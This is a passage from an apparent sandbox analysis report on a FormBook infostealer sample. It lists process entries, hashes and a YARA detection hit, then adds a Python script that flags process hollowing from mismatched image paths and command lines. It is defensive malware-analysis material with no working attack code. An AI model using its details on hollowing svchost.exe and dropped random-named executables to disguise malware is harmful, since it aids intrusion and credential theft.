                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:11
                                                            Start time:03:03:10
                                                            Start date:01/04/2025
                                                            Path:C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UHcFP3RaOlKm.exe"
                                                            Imagebase:0xc00000
                                                            File size:143'872 bytes
                                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:12
                                                            Start time:03:03:22
                                                            Start date:01/04/2025
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff76aab0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true
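Three entries in the process list above run one executable while their command line names another: Target 2 is C:\Windows\SysWOW64\svchost.exe started with the sample's own command line, and Targets 9 and 11 are UJarIfYl5U.exe started with command lines naming Que6zKtSrCf5.exe and UHcFP3RaOlKm.exe. That is the trace process hollowing leaves in the process table (create suspended, replace the image, resume). The check below is an added example, not part of the report: it reproduces the six entries as records and flags the ones whose image basename differs from the program the command line claims to run. A mismatch on its own is a lead rather than proof, since a parent can legitimately pass CreateProcess an application name that differs from the argv[0] it writes, so confirm it against the cross-process memory writes and thread-context changes before calling it hollowing.

```python
"""Flag processes whose command line names a different executable than the image (added example)."""
import ntpath

DROP_DIR = r"C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj"

# Copied from the Target ID entries in the report above.
PROCESSES = [
    {"id": 1, "path": r"C:\Users\user\Desktop\eoIIBcxUj3.exe",
     "cmdline": r'"C:\Users\user\Desktop\eoIIBcxUj3.exe"'},
    {"id": 2, "path": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\eoIIBcxUj3.exe"'},
    {"id": 9, "path": DROP_DIR + r"\UJarIfYl5U.exe",
     "cmdline": '"' + DROP_DIR + r'\Que6zKtSrCf5.exe"'},
    {"id": 10, "path": r"C:\Windows\SysWOW64\sfc.exe",
     "cmdline": r'"C:\Windows\SysWOW64\sfc.exe"'},
    {"id": 11, "path": DROP_DIR + r"\UJarIfYl5U.exe",
     "cmdline": '"' + DROP_DIR + r'\UHcFP3RaOlKm.exe"'},
    {"id": 12, "path": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
]


def first_token(cmdline):
    """Program the command line claims to run: the quoted token, or the first word."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end != -1 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def image_cmdline_mismatch(proc):
    """True when the on-disk image and the command line's program differ by basename.
    Comparison is case-insensitive because Windows paths are (Firefox.exe == firefox.exe)."""
    image = ntpath.basename(proc["path"]).lower()
    claimed = ntpath.basename(first_token(proc["cmdline"])).lower()
    return image != claimed


def flag_hollowed(processes):
    """IDs of processes worth a closer look, in list order."""
    return [p["id"] for p in processes if image_cmdline_mismatch(p)]


if __name__ == "__main__":
    for p in PROCESSES:
        mark = "MISMATCH" if image_cmdline_mismatch(p) else "ok"
        print(f"{p['id']:>2} {mark:8} {ntpath.basename(p['path'])} <- {first_token(p['cmdline'])}")
```

ntpath is used so the Windows paths split correctly even when the script runs on a non-Windows analysis box. Target 12 (Firefox) differs from its command line only in letter case and is correctly not flagged; the flagged set is exactly the svchost.exe instance and the two launches of the dropped UJarIfYl5U.exe.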

                                                            No disassembly